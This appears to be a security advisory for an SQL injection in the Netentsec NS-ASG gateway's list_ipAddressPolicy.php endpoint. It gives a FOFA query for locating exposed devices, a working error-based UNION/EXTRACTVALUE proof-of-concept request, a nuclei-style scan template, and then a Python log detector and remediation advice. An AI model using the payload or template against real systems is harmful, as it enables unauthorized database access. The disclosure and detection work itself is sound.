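1. Vulnerability Information
Vulnerability name: Netentsec (网康) Application Security Gateway (NS-ASG) list_ipAddressPolicy SQL injection vulnerability
Vulnerability category: SQL injection
Risk level: High
2. Vulnerability Description
The list_ipAddressPolicy endpoint of the Netentsec Application Security Gateway (NS-ASG) is vulnerable to SQL injection.
An attacker can craft malicious SQL statements that are injected and executed against the database, which may lead to sensitive information disclosure, database tampering, or other serious consequences.
3. Affected Scope
Netentsec Application Security Gateway (NS-ASG)
4. Vulnerability Reproduction
FOFA: app="网康-NS-ASG-应用安全网关"
POC: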
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
5. Script
id: CVE-2024-2022
info:
  name: 网康NS-ASG应用安全网关sql注入漏洞
  severity: high
  author: tt
  metadata:
    max-request: 1
    fofa-query: app="网康科技-NS-ASG安全网关"
    verified: true
requests:
  - raw:
      - |+
        GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(123456)),0x7e)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'e10adc3949ba59abbe56e057f20f883e')"
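
For log triage, the following added example (not part of the original advisory or of any vendor tooling) scans web access logs for requests to /admin/list_ipAddressPolicy.php whose GroupId is not a plain integer. It assumes combined-format access logs and that legitimate GroupId values are integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in this advisory.
TARGET_PATH = "/admin/list_ipaddresspolicy.php"
PARAM = "GroupId"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate GroupId is a plain integer.
INT_RE = re.compile(r"-?\d{1,10}")


def suspicious_group_id(log_line):
    """Return the decoded GroupId if the line requests the endpoint with a
    non-integer GroupId, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if parts.path.lower() != TARGET_PATH:
        return None
    # parse_qs decodes %XX and '+', so encoded payloads are normalised first.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    for value in values:
        if not INT_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded GroupId) for every suspicious line."""
    hits = []
    for line in lines:
        value = suspicious_group_id(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2024:10:00:01 +0800] "GET /admin/list_ipAddressPolicy.php?GroupId=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Mar/2024:10:00:05 +0800] "GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Mar/2024:10:00:09 +0800] "GET /admin/list_ipAddressPolicy.php?GroupId=3%27 HTTP/1.1" 200 298 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Mar/2024:10:00:12 +0800] "GET /admin/index.php?GroupId=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} suspicious GroupId: {value!r}")
```

The same integer-only check, applied server-side before the value reaches the query, is the input-validation half of the fix; parameterized queries are the other half.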